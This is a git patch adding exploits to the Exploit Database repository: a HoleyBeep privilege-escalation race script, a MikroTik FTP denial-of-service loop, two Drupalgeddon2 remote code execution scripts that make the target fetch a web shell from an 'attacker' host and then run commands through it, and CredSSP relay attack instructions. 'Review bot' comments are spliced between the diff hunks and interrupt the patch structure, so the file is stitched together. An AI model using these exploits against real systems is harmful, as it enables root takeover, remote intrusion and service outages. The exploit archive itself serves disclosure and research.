From bef325a7364ff8c97c02ac5dbc3814faa19a9375 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sat, 14 Apr 2018 05:01:49 +0000 Subject: [PATCH] DB: 2018-04-14 9 changes to exploits/shellcodes GNU Beep 1.3 - 'HoleyBeep' Local Privilege Escalation Microsoft Credential Security Support Provider - Remote Code Execution WordPress Plugin Shopping Cart 3.0.4 - Unrestricted Arbitrary File Upload Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (PoC) MikroTik 6.41.4 - FTP daemon Denial of Service PoC Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution
---
exploits/linux/dos/43178.c | 3 +-
exploits/linux/local/44452.py | 90 +++++++++++++++++++
exploits/linux/webapps/44450.txt | 19 ++++
.../php/webapps/{35730.txt => 35730.html} | 6 +-
exploits/php/webapps/44448.py | 21 +++++
exploits/php/webapps/44449.rb | 41 +++++++++
exploits/windows/remote/44453.md | 51 +++++++++++
files_exploits.csv | 7 +-
8 files changed, 235 insertions(+), 3 deletions(-)
create mode 100755 exploits/linux/local/44452.py
create mode 100644 exploits/linux/webapps/44450.txt
rename exploits/php/webapps/{35730.txt => 35730.html} (90%)
create mode 100755 exploits/php/webapps/44448.py
create mode 100755 exploits/php/webapps/44449.rb
create mode 100644 exploits/windows/remote/44453.md
diff --git a/exploits/linux/dos/43178.c b/exploits/linux/dos/43178.c
index f4cfb32af..f36f5ded1 100644
--- a/exploits/linux/dos/43178.c
+++ b/exploits/linux/dos/43178.c
@@ -6,9 +6,10 @@ I found the following bug with an AFL-based fuzzer: When __walk_page_range() is used on a VM_HUGETLB VMA, callbacks from the mm_walk structure are only invoked for present pages. However, do_mincore() assumes that it will always get callbacks for all pages in the range passed to walk_page_range(), and when this assumption is violated, sys_mincore() copies uninitialized memory from the page allocator to userspace. This bug can be reproduced with the following testcase: -*/ $ cat mincore_test.c +*/ + #define _GNU_SOURCE #include #include
diff --git a/exploits/linux/local/44452.py b/exploits/linux/local/44452.py
new file mode 100755
index 000000000..1db741ae0
--- /dev/null
+++ b/exploits/linux/local/44452.py
@@ -0,0 +1,90 @@
+#!/usr/bin/env python3
+#
+# E-DB Note ~ https://gist.github.com/Arignir/0b9d45c56551af39969368396e27abe8/ec853f14afd6e86fb3f2efce2086e28f33039ddc
+# E-DB Note ~ https://sigint.sh/#/holeybeep
+#
+# This is an exploit for HoleyBeep.
+#
+# To use it, place any command you want root to execute in `/tmp/x`.
+# ```
+# $ cat /tmp/x
+# echo PWNED $(whoami)
+# ```
+# The exploit takes a path to write to (the file must already exist) and rewrites its first bytes to /*/x. This means that if it's a shell script, it will execute /tmp/x as its first and only command.
+#
+# To gain root access, the idea is to use the exploit to overwrite any file in /etc/profile.d/ so it will execute /*/x on the next login, possibly as the root user.
+#
+# Variants are possible using cron instead of the shell, so you don't have to wait until root logs in.
+#
+
+import argparse
+import shutil
+import os
+import subprocess
+import time
+import signal
+import ntpath
+
+TMP_PATH="beep_exploit"
+
+def backup_output(path):
+ backup_path = ntpath.basename(path + ".bak")
+ if os.path.isfile(path):
+ shutil.copy(path, backup_path)
+ print('Backup made at \'{}\''.format(backup_path))
+
+def main():
+ parser = argparse.ArgumentParser(description='Holey beep exploit script.')
+ parser.add_argument('output', metavar='OUTPUT', help='the output file to corrupt')
+ parser.add_argument('--path', default="/usr/bin/beep", help='path to beep')
+ parser.add_argument('--time-low', default=6000, type=int, help='time to wait (micro-seconds), lower bound')
+ parser.add_argument('--time-high', default=6900, type=int, help='time to wait (micro-seconds), higher bound')
+ parser.add_argument('--no-backup', action='store_true', help='doesn\'t backup the output file')
+ args = parser.parse_args()
+
+ if not args.no_backup:
+ backup_output(args.output)
+
+ devnull = open("/dev/null")
+
+ timer = args.time_low
+ while True:
+ # Create original symlink
+ try:
+ os.remove(TMP_PATH)
+ except OSError:
+ pass
+ os.symlink("/dev/input/event0", TMP_PATH)
+
+ # Open subprocess
+ p = subprocess.Popen([args.path, "--device", TMP_PATH, "-l", "1", "-n", "-l", "2016356911"], stderr=devnull)
+ time.sleep(timer/2 / 1000000.0)
+
+ # Replace symlink
+ try:
+ os.remove(TMP_PATH)
+ except OSError:
+ pass
+ os.symlink(args.output, TMP_PATH)
+ time.sleep(timer/2 / 1000000.0)
+
+ # Trigger SIGINT
+ os.kill(p.pid, signal.SIGINT)
+
+ # Kill process if it's sill alive
+ time.sleep(200.0 / 1000000.0)
+ os.kill(p.pid, signal.SIGKILL)
+
+ # Verify result
+ with open(args.output, 'rb') as f:
+ data = f.read(4)
+ if data == b'/*/x':
+ print("Done!")
+ break
+
+ timer += 1
+ if timer > args.time_high:
+ timer = args.time_low
+
+if __name__ == '__main__':
+ main()
\ No newline at end of file
diff --git a/exploits/linux/webapps/44450.txt b/exploits/linux/webapps/44450.txt
new file mode 100644
index 000000000..de6ede0d4
--- /dev/null
+++ b/exploits/linux/webapps/44450.txt
@@ -0,0 +1,19 @@
+################
+#Title: MikroTik 6.41.4 Denial of service FTP daemon crash
+#CVE: CVE-2018-10070
+#CWE: CWE-400
+#Exploit Author: Hosein Askari (FarazPajohan)
+#Vendor HomePage: https://mikrotik.com/
+#Version : 6.41.4 (Released 2018-Apr-05) | All Version
+#Date: 13-05-2018
+#Category: Network Appliance
+#Description: A vulnerability in MikroTik Version 6.41.4 could allow an unauthenticated remote attacker to exhaust all available CPU and all available RAM by sending crafted FTP requests on port 21 that begins with many '\0' characters, #preventing the affected router from accepting new FTP connections. The router will reboot after 10 minutes, logging a "router was rebooted without proper shutdown" message.
+#POC: https://vimeo.com/264461602
+################
+
+for i in `seq 1 100`
+
+do
+ cat craft | nc -nv 21 &
+ sleep 2
+done
\ No newline at end of file
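Review bot: `devnull = open("/dev/null")` in main() opens the sink read-only and never closes it, yet every `subprocess.Popen` call in the loop receives it as `stderr=`, so the child's stderr would be an O_RDONLY descriptor (writes to it fail rather than being discarded) and the handle leaks for the whole run. The stdlib form does what the line intends in one change: `p = subprocess.Popen([args.path, "--device", TMP_PATH, "-l", "1", "-n", "-l", "2016356911"], stderr=subprocess.DEVNULL)` with the `open` line removed. In backup_output the backup name is `ntpath.basename(path + ".bak")`, a bare filename, so the copy lands in the current working directory rather than beside the target; a comment `# backup is written to the CWD, not next to the target file` on that line (and `os.path.basename` rather than the Windows-path module) would spare a reader the surprise.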
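Review bot: The header line `#Date: 13-05-2018` is later than both the commit date (14 Apr 2018) and the files_exploits.csv row for this file, which records 2018-04-13; the day and month appear to be swapped, and the line should read `#Date: 13-04-2018`. The `#Description:` line also carries a stray `#preventing` mid-sentence, which looks like the leading `#` of a wrapped comment line that was joined onto the previous one; either drop that `#` or put the remainder on its own `#` line so the header reads cleanly.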
diff --git a/exploits/php/webapps/35730.txt b/exploits/php/webapps/35730.html
similarity index 90%
rename from exploits/php/webapps/35730.txt
rename to exploits/php/webapps/35730.html
index 30f6e17d7..9033f962b 100644
--- a/exploits/php/webapps/35730.txt
+++ b/exploits/php/webapps/35730.html
@@ -1,3 +1,4 @@
+
@@ -24,6 +26,7 @@ Login as regular user (created using wp-login.php?action=register):
+
\ No newline at end of file
diff --git a/exploits/php/webapps/44448.py b/exploits/php/webapps/44448.py
new file mode 100755
index 000000000..392e2ba3a
--- /dev/null
+++ b/exploits/php/webapps/44448.py
@@ -0,0 +1,21 @@
+#!/usr/bin/env
+import sys
+import requests
+
+print ('################################################################')
+print ('# Proof-Of-Concept for CVE-2018-7600')
+print ('# by Vitalii Rudnykh')
+print ('# Thanks by AlbinoDrought, RicterZ, FindYanot, CostelSalanders')
+print ('# https://github.com/a2u/CVE-2018-7600')
+print ('################################################################')
+print ('Provided only for educational or information purposes\n')
+
+target = raw_input('Enter target url (example: https://domain.ltd/): ')
+
+url = target + 'user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
+payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'wget http://attacker/hello.txt'}
+
+r = requests.post(url, data=payload)
+if r.status_code != 200:
+ sys.exit("Not exploitable")
+print ('\nCheck: '+target+'hello.txt')
\ No newline at end of file
diff --git a/exploits/php/webapps/44449.rb b/exploits/php/webapps/44449.rb
new file mode 100755
index 000000000..053f2ae56
--- /dev/null
+++ b/exploits/php/webapps/44449.rb
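Review bot: The shebang `#!/usr/bin/env` names no interpreter, so running the file directly fails inside env rather than in Python; since the script relies on `raw_input` it only runs under Python 2, and the first line should say so: `#!/usr/bin/env python2`. The header banner should also note that `requests` is a third-party dependency, the only one the script has. On the detection side, the request this PoC sends — a POST to `user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax` carrying `mail[#post_render][]` — is what WAF or IDS rules for CVE-2018-7600 can key on. The `sys.exit("Not exploitable")` on any non-200 response conflates "unreachable or blocked" with "unaffected", so the message overstates what was actually tested.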
@@ -0,0 +1,41 @@
+# EDB-Note. Have the contents of "shell" on http://attacker/shell.php
+
+require 'net/http'
+
+# Hans Topo ruby port from Drupalggedon2 exploit.
+# Based on Vitalii Rudnykh exploit
+
+target = ARGV[0]
+command = ARGV[1]
+
+url = target + '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
+
+shell = ""
+
+payload = 'mail%5B%23markup%5D%3Dwget%20http%3A%2F%2Fattacker%2Fshell.php%26mail%5B%23type%5D%3Dmarkup%26form_id%3Duser_register_form%26_drupal_ajax%3D1%26mail%5B%23post_render%5D%5B%5D%3Dexec'
+
+uri = URI(url)
+
+http = Net::HTTP.new(uri.host,uri.port)
+
+if uri.scheme == 'https'
+ http.use_ssl = true
+ http.verify_mode = OpenSSL::SSL::VERIFY_NONE
+end
+
+req = Net::HTTP::Post.new(uri.path)
+req.body = payload
+
+response = http.request(req)
+
+if response.code != "200"
+ puts "[*] Response: " + response.code
+ puts "[*] Target seems not to be exploitable"
+ exit
+end
+
+puts "[*] Target seems to be exploitable."
+
+exploit_uri = URI(target+"/sh.php?cmd=#{command}")
+response = Net::HTTP.get_response(exploit_uri)
+puts response.body
\ No newline at end of file
diff --git a/exploits/windows/remote/44453.md b/exploits/windows/remote/44453.md
new file mode 100644
index 000000000..7cddd77da
--- /dev/null
+++ b/exploits/windows/remote/44453.md
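Review bot: `shell = ""` is assigned and never read anywhere in the file; drop the line. The https branch sets `http.verify_mode = OpenSSL::SSL::VERIFY_NONE`, which turns off certificate validation for the session, while `OpenSSL` is referenced with only `require 'net/http'` in place — net/http autoloads openssl once `use_ssl=` is called, I believe, but an explicit `require 'openssl'` beside the existing require removes the dependence on that. A one-line comment on the verify_mode line, `# VERIFY_NONE disables TLS certificate validation`, makes the reduced-security choice visible to whoever reuses this file as a template.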
@@ -0,0 +1,51 @@
+# credssp
+
+This is a poc code for exploiting CVE-2018-0886. It should be used for educational purposes only.
+It relies on a fork of the rdpy project(https://github.com/preempt/rdpy), allowing also credssp relay.
+
+
+Written by Eyal Karni, Preempt
+ekarni@preempt.com
+
+# Build
+
+## Instructions (Linux)
+If you are using Ubuntu 14 , check the install file..
+It was tested on Ubuntu 16.04.
+
+```
+$ git clone https://github.com/preempt/rdpy.git rdpy
+$ git clone https://github.com/preempt/credssp.git
+$ cd credssp/install
+$ sh install.sh
+$ cd ../../rdpy
+$ sudo python setup.py install
+```
+
+EDB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44453.zip
+
+* It assumes a pretty clean inital state. Best to uninstall first relevant compontants such as cryptography,pyopenssl maybe (pip uninstall cryptography).
+* A different version of openssl needed to be installed for this to run successfully. The install script does that.
+* Please follow the instructions in the described order.
+
+# Running the exploit
+
+
+Export a certificate suitable for Server Authentication from any domain.
+
+
+To generate a suitable certificate for the command to execute :
+
+```
+$ python credssp/bin/gen_cmd.py -c ExportedCert -o exploitc.pem -k exploitk.pem CMD
+```
+
+(exploitc.pem ,exploitk.pem are the generated certificate and private key respectively)
+
+To run the attack script:
+
+```
+$ python /usr/local/bin/rdpy-rdpcredsspmitm.py -k exploitk.pem -c exploitc.pem TargetServer
+```
+
+More details are in the usage section of the scripts(--help).
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 06a3f771d..ceac200e3 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -9642,6 +9642,7 @@ id,file,description,date,author,type,platform,port
 44423,exploits/windows/local/44423.py,"GoldWave 5.70 - Local Buffer Overflow (SEH Unicode)",2018-04-09,bzyo,local,windows,
 44426,exploits/linux/local/44426.py,"PMS 0.42 - Local Stack-Based Overflow (ROP)",2018-04-09,"Juan Sacco",local,linux,
 44438,exploits/windows_x86/local/44438.txt,"DVD X Player Standard 5.5.3.9 - Buffer Overflow",2018-04-10,"Prasenjit Kanti Paul",local,windows_x86,
+44452,exploits/linux/local/44452.py,"GNU Beep 1.3 - 'HoleyBeep' Local Privilege Escalation",2018-04-06,Pirhack,local,linux,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -16390,6 +16391,7 @@ id,file,description,date,author,type,platform,port
 44398,exploits/hardware/remote/44398.py,"Moxa AWK-3131A 1.4 < 1.7 - 'Username' OS Command Injection",2017-04-03,Talos,remote,hardware,
 44415,exploits/android/remote/44415.txt,"LineageOS 14.1 Blueborne - Remote Code Execution",2018-04-06,"Marcin Kozlowski",remote,android,
 44446,exploits/hardware/remote/44446.py,"F5 BIG-IP 11.6 SSL Virtual Server - 'Ticketbleed' Memory Disclosure",2017-02-14,@0x00string,remote,hardware,
+44453,exploits/windows/remote/44453.md,"Microsoft Credential Security Support Provider - Remote Code Execution",2018-04-13,Preempt,remote,windows,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -34877,7 +34879,7 @@ id,file,description,date,author,type,platform,port
 35726,exploits/php/webapps/35726.py,"Getsimple CMS 3.0 - 'set' Local File Inclusion",2011-05-07,"AutoSec Tools",webapps,php,
 35727,exploits/php/webapps/35727.txt,"HOMEPIMA Design - 'filedown.php' Local File Disclosure",2011-05-09,KnocKout,webapps,php,
 35728,exploits/asp/webapps/35728.txt,"Keyfax Customer Response Management 3.2.2.6 - Multiple Cross-Site Scripting Vulnerabilities",2011-05-09,"Richard Brain",webapps,asp,
-35730,exploits/php/webapps/35730.txt,"WordPress Plugin Shopping Cart 3.0.4 - Unrestricted Arbitrary File Upload",2015-01-08,"Kacper Szurek",webapps,php,80
+35730,exploits/php/webapps/35730.html,"WordPress Plugin Shopping Cart 3.0.4 - Unrestricted Arbitrary File Upload",2015-01-08,"Kacper Szurek",webapps,php,80
 35733,exploits/php/webapps/35733.txt,"vBulletin MicroCART 1.1.4 - Arbitrary Files Deletion / SQL Injection / Cross-Site Scripting",2015-01-09,Technidev,webapps,php,80
 35734,exploits/php/webapps/35734.txt,"ZAPms 1.22 - 'nick' SQL Injection",2011-05-09,KedAns-Dz,webapps,php,
 35736,exploits/php/webapps/35736.txt,"poMMo Aardvark PR16.1 - Multiple Cross-Site Scripting Vulnerabilities",2011-05-10,"High-Tech Bridge SA",webapps,php,
@@ -39143,3 +39145,6 @@ id,file,description,date,author,type,platform,port
 44443,exploits/php/webapps/44443.txt,"WordPress Plugin File Upload 4.3.2 - Stored Cross-Site Scripting",2018-04-10,ManhNho,webapps,php,
 44444,exploits/php/webapps/44444.txt,"WordPress Plugin File Upload 4.3.3 - Stored Cross-Site Scripting (PoC)",2018-04-10,ManhNho,webapps,php,
 44447,exploits/php/webapps/44447.txt,"Joomla Convert Forms version 2.0.3 - Formula Injection (CSV Injection)",2018-04-12,"Sairam Jetty",webapps,php,
+44448,exploits/php/webapps/44448.py,"Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (PoC)",2018-04-13,"Vitalii Rudnykh",webapps,php,
+44450,exploits/linux/webapps/44450.txt,"MikroTik 6.41.4 - FTP daemon Denial of Service PoC",2018-04-13,FarazPajohan,webapps,linux,
+44449,exploits/php/webapps/44449.rb,"Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution",2018-04-13,"Hans Topo",webapps,php,